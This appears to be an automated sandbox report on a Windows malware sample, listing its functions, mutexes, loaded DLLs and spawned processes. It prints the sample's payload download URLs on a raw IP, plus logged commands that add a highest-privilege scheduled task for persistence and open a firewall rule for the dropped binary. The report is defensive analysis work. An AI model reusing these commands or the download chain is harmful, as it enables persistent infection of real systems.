Source: C:\temp333\install_2.dll Code function: 2_2_6D1D9600 2_2_6D1D9600
Source: C:\temp333\install_2.dll Code function: 2_2_6D1D33D2 2_2_6D1D33D2
Source: C:\temp333\install_2.dll Code function: 2_2_6D310D10 2_2_6D310D10
Source: C:\temp333\install_2.dll Code function: 2_2_6D36CD50 2_2_6D36CD50
Source: C:\temp333\install_2.dll Code function: 2_2_6D358DF0 2_2_6D358DF0
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E8CC0 2_2_6D1E8CC0
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E8F10 2_2_6D1E8F10
Source: C:\temp333\install_2.dll Code function: 2_2_6D384E00 2_2_6D384E00
Source: C:\temp333\install_2.dll Code function: 2_2_6D38CEF0 2_2_6D38CEF0
Source: C:\temp333\install_2.dll Code function: 2_2_6D38C910 2_2_6D38C910
Source: C:\temp333\install_2.dll Code function: 2_2_6D1DC980 2_2_6D1DC980
Source: C:\temp333\install_2.dll Code function: 2_2_6D1EE800 2_2_6D1EE800
Source: C:\temp333\install_2.dll Code function: 2_2_6D358880 2_2_6D358880
Source: C:\temp333\install_2.dll Code function: 2_2_6D3708F0 2_2_6D3708F0
Source: C:\temp333\install_2.dll Code function: 2_2_6D358B70 2_2_6D358B70
Source: C:\temp333\install_2.dll Code function: 2_2_6D1F0B40 2_2_6D1F0B40
Source: C:\temp333\install_2.dll Code function: 2_2_6D2E0A30 2_2_6D2E0A30
Source: C:\temp333\install_2.dll Code function: 2_2_6D1DEA50 2_2_6D1DEA50
Source: C:\temp333\install_2.dll Code function: 2_2_6D220500 2_2_6D220500
Source: C:\temp333\install_2.dll Code function: 2_2_6D36A511 2_2_6D36A511
Source: C:\temp333\install_2.dll Code function: 2_2_6D36E51E 2_2_6D36E51E
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E8550 2_2_6D1E8550
Source: C:\temp333\install_2.dll Code function: 2_2_6D2B65A0 2_2_6D2B65A0
Source: C:\temp333\install_2.dll Code function: 2_2_6D39A590 2_2_6D39A590
Source: C:\temp333\install_2.dll Code function: 2_2_6D398470 2_2_6D398470
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E8710 2_2_6D1E8710
Source: C:\temp333\install_2.dll Code function: 2_2_6D3867E0 2_2_6D3867E0
Source: C:\temp333\install_2.dll Code function: 2_2_6D3907C0 2_2_6D3907C0
Source: C:\temp333\install_2.dll Code function: 2_2_6D34C610 2_2_6D34C610
Source: C:\temp333\install_2.dll Code function: 2_2_6D1DC630 2_2_6D1DC630
Source: C:\temp333\install_2.dll Code function: 2_2_6D304600 2_2_6D304600
Source: C:\temp333\install_2.dll Code function: 2_2_6D1F06C0 2_2_6D1F06C0
Source: C:\temp333\install_2.dll Code function: 2_2_6D34C170 2_2_6D34C170
Source: C:\temp333\install_2.dll Code function: 2_2_6D220140 2_2_6D220140
Source: C:\temp333\install_2.dll Code function: 2_2_6D2881A0 2_2_6D2881A0
Source: C:\temp333\install_2.dll Code function: 2_2_6D31C190 2_2_6D31C190
Source: C:\temp333\install_2.dll Code function: 2_2_6D34A180 2_2_6D34A180
Source: C:\temp333\install_2.dll Code function: 2_2_6D39C0E0 2_2_6D39C0E0
Source: C:\temp333\install_2.dll Code function: 2_2_6D2C40F0 2_2_6D2C40F0
Source: C:\temp333\install_2.dll Code function: 2_2_6D38A3A0 2_2_6D38A3A0
Source: C:\temp333\install_2.dll Code function: 2_2_6D358220 2_2_6D358220
Source: C:\temp333\install_2.dll Code function: 2_2_6D322210 2_2_6D322210
Source: C:\temp333\install_2.dll Code function: 2_2_6D25A216 2_2_6D25A216
Source: C:\temp333\install_2.dll Code function: 2_2_6D390240 2_2_6D390240
Source: C:\temp333\install_2.dll Code function: 2_2_6D1F02E0 2_2_6D1F02E0
Source: C:\temp333\install_2.dll Code function: 2_2_6D2C1D60 2_2_6D2C1D60
Source: C:\temp333\install_2.dll Code function: 2_2_6D327DB0 2_2_6D327DB0
Source: C:\temp333\install_2.dll Code function: 2_2_6D287C60 2_2_6D287C60
Source: C:\temp333\install_2.dll Code function: 2_2_6D37BC40 2_2_6D37BC40
Source: C:\temp333\install_2.dll Code function: 2_2_6D329CB0 2_2_6D329CB0
Source: C:\temp333\install_2.dll Code function: 2_2_6D387C91 2_2_6D387C91
Source: C:\temp333\install_2.dll Code function: 2_2_6D287F00 2_2_6D287F00
Source: C:\temp333\install_2.dll Code function: 2_2_6D1F7F40 2_2_6D1F7F40
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E9F80 2_2_6D1E9F80
Source: C:\temp333\install_2.dll Code function: 2_2_6D395FC0 2_2_6D395FC0
Source: C:\temp333\install_2.dll Code function: 2_2_6D21FE20 2_2_6D21FE20
Source: C:\temp333\install_2.dll Code function: 2_2_6D34BE00 2_2_6D34BE00
Source: C:\temp333\install_2.dll Code function: 2_2_6D397E00 2_2_6D397E00
Source: C:\temp333\install_2.dll Code function: 2_2_6D323E60 2_2_6D323E60
Source: C:\temp333\install_2.dll Code function: 2_2_6D1EB910 2_2_6D1EB910
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E7920 2_2_6D1E7920
Source: C:\temp333\install_2.dll Code function: 2_2_6D357880 2_2_6D357880
Source: C:\temp333\install_2.dll Code function: 2_2_6D3978F0 2_2_6D3978F0
Source: C:\temp333\install_2.dll Code function: 2_2_6D3278D0 2_2_6D3278D0
Source: C:\temp333\install_2.dll Code function: 2_2_6D27DB00 2_2_6D27DB00
Source: C:\temp333\install_2.dll Code function: 2_2_6D38DB17 2_2_6D38DB17
Source: C:\temp333\install_2.dll Code function: 2_2_6D327B50 2_2_6D327B50
Source: C:\temp333\install_2.dll Code function: 2_2_6D395B9C 2_2_6D395B9C
Source: C:\temp333\install_2.dll Code function: 2_2_6D379A30 2_2_6D379A30
Source: C:\temp333\install_2.dll Code function: 2_2_6D2D9AD0 2_2_6D2D9AD0
Source: C:\temp333\install_2.dll Code function: 2_2_6D1E9560 2_2_6D1E9560
Source: C:\temp333\install_2.dll Code function: 2_2_6D3455E0 2_2_6D3455E0
Source: C:\temp333\install_2.dll Code function: 2_2_6D349480 2_2_6D349480
Source: C:\temp333\install_2.dll Code function: 2_2_6D359480 2_2_6D359480
Source: C:\temp333\install_2.dll Code function: 2_2_6D37B7A0 2_2_6D37B7A0
Source: C:\temp333\install_2.dll Code function: 2_2_6D3997F0 2_2_6D3997F0
Source: C:\temp333\install_2.dll Code function: 2_2_6D359670 2_2_6D359670
Source: C:\temp333\install_2.dll Code function: 2_2_6D1DD180 2_2_6D1DD180
Source: C:\temp333\install_2.dll Code function: 2_2_6D3591D0 2_2_6D3591D0
Source: C:\temp333\install_2.dll Code function: 2_2_6D345080 2_2_6D345080
Source: C:\temp333\install_2.dll Code function: 2_2_6D2C10C0 2_2_6D2C10C0
Source: C:\temp333\install_2.dll Code function: 2_2_6D387370 2_2_6D387370
Source: C:\temp333\install_2.dll Code function: 2_2_6D399250 2_2_6D399250
Source: C:\temp333\install_2.dll Code function: 2_2_6D2CD29F 2_2_6D2CD29F
Source: C:\temp333\install_2.dll Code function: 2_2_6D38F2F0 2_2_6D38F2F0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAAF480 5_2_6CAAF480
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB04C0 5_2_6CAB04C0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA5400 5_2_6CAA5400
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB8D30 5_2_6CAB8D30
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA9650 5_2_6CAA9650
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA4FF0 5_2_6CAA4FF0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB6750 5_2_6CAB6750
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB78E0 5_2_6CAB78E0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB98E0 5_2_6CAB98E0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAAE87E 5_2_6CAAE87E
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CABD85C 5_2_6CABD85C
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA5850 5_2_6CAA5850
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA11E0 5_2_6CAA11E0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB8A20 5_2_6CAB8A20
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB0200 5_2_6CAB0200
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB0BA0 5_2_6CAB0BA0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB03A4 5_2_6CAB03A4
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA4BB0 5_2_6CAA4BB0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB0380 5_2_6CAB0380
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB83E0 5_2_6CAB83E0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAB43C0 5_2_6CAB43C0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA4B20 5_2_6CAA4B20
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798C72B0 appears 37 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798DD4D0 appears 99 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798D8740 appears 158 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798CA700 appears 93 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF779830CD0 appears 135 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798DCA20 appears 114 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798DC6E0 appears 33 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798C5FC0 appears 143 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798DD3E0 appears 100 times
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: String function: 00007FF7798DC840 appears 43 times
Source: C:\temp333\install_2.dll Code function: String function: 6D389ED0 appears 31 times
Source: C:\temp333\install_2.dll Code function: String function: 6D38B7E0 appears 51 times
Source: C:\temp333\install_2.dll Code function: String function: 6D366230 appears 31 times
Source: C:\temp333\install_2.dll Code function: String function: 6D39CB80 appears 167 times
Source: C:\temp333\install_2.dll Code function: String function: 6D39C830 appears 223 times
Source: C:\temp333\install_2.dll Code function: String function: 6D39C940 appears 159 times
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: String function: 6CABDE20 appears 37 times
One or more processes crash
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 556
PE file contains more sections than normal
Source: Q0cWJo6Jvh.exe Static PE information: Number of sections : 19 > 10
Sample file is different than original file name gathered from version info
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2177810567.00000279C7398000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameG2M.exe8 vs Q0cWJo6Jvh.exe
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2724204838.00000279C739B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameG2M.exe8 vs Q0cWJo6Jvh.exe
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2177915595.00000279C7394000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameG2M.exe8 vs Q0cWJo6Jvh.exe
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2178029144.00000279C7395000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameG2M.exe8 vs Q0cWJo6Jvh.exe
Source: ybtrrus.exe, 00000005.00000002.3340950977.000000000100E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NumberCaseSig Value="False"/>*.frm;*.vb;*.vbp;.vbs"/>
Source: ybtrrus.exe, 00000005.00000002.3342177805.0000000002B49000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: *.bas;*.cls;*.ctl;*.frm;*.vb;*.vbp;*.vbs
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: <Mask Value="*.bas;*.cls;*.ctl;*.frm;*.vb;*.vbp;*.vbs"/>
Source: ybtrrus.exe, 00000005.00000002.3342177805.0000000002B49000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: (*.bas;*.cls;*.ctl;*.frm;*.vb;*.vbp;*.vbs@
Source: classification engine Classification label: mal80.spyw.evad.winEXE@25/11@3/4
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAA8830 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle, 5_2_6CAA8830
Source: C:\5p9SnCM5jV\ybtrrus.exe File created: C:\Users\user\AppData\Roaming\Scooter Software Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\BeyondCompare3
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: NULL
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_6916
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1b00$432c4c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3472:120:WilError_03
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\BeyondCompare3
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1734$432c4c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_03
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_1764
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$6e4
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1b04
Source: C:\5p9SnCM5jV\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\Beyond Compare: BE887BC7-16B2-48B5-B618-B3A52A26EC10
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1764
Source: C:\5p9SnCM5jV\ybtrrus.exe File created: C:\Users\user\AppData\Local\Temp\ybtrrus.madExcept Jump to behavior
Source: Yara match File source: 5.0.ybtrrus.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Q0cWJo6Jvh.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\5p9SnCM5jV\ybtrrus.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Q0cWJo6Jvh.exe String found in binary or memory: FANTASMA/install_2.exe
Source: Q0cWJo6Jvh.exe String found in binary or memory: http://147.45.116.5/FANTASMA/install_2.exe
Source: Q0cWJo6Jvh.exe String found in binary or memory: GEThttp://147.45.116.5/FANTASMA/g2m.dllDownloadBinary/1.0147.45.116.5FANTASMA/g2m.dllhttp://147.45.116.5/FANTASMA/install_2.exeFANTASMA/install_2.exeFalha ao iniciar o processo. C
Source: unknown Process created: C:\Users\user\Desktop\Q0cWJo6Jvh.exe "C:\Users\user\Desktop\Q0cWJo6Jvh.exe"
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Process created: C:\temp333\install_2.dll "C:\temp333\install_2.dll"
Source: C:\temp333\install_2.dll Process created: C:\5p9SnCM5jV\ybtrrus.exe "C:\5p9SnCM5jV\ybtrrus.exe"
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\5p9SnCM5jV\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\5p9SnCM5jV\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any
Source: unknown Process created: C:\5p9SnCM5jV\ybtrrus.exe C:\5p9SnCM5jV\ybtrrus.exe
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 556
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Process created: C:\temp333\install_2.dll "C:\temp333\install_2.dll" Jump to behavior
Source: C:\temp333\install_2.dll Process created: C:\5p9SnCM5jV\ybtrrus.exe "C:\5p9SnCM5jV\ybtrrus.exe" Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer" Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\5p9SnCM5jV\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00 Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\5p9SnCM5jV\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns Jump to behavior
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\temp333\install_2.dll Section loaded: apphelp.dll Jump to behavior
Source: C:\temp333\install_2.dll Section loaded: g2m.dll Jump to behavior
Source: C:\temp333\install_2.dll Section loaded: secur32.dll Jump to behavior
Source: C:\temp333\install_2.dll Section loaded: vcruntime140.dll Jump to behavior
Source: C:\temp333\install_2.dll Section loaded: cryptbase.dll Jump to behavior
Source: C:\temp333\install_2.dll Section loaded: sspicli.dll Jump to behavior
Source: C:\temp333\install_2.dll Section loaded: mswsock.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: version.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: mpr.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wininet.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: winmm.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: devobj.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: c_is2022.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: c_g18030.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: c_gsm7.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: c_iscii.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: netutils.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: olepro32.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wldp.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: unrar.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: 7zxa.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: magnification.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: d3d9.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: security.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: secur32.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: colorui.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: mscms.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: userenv.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: coloradapterclient.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: compstui.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: inetres.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: propsys.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: profapi.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: winsta.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: idndl.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: mlang.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: edputil.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: slc.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: userenv.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: sppc.dll Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
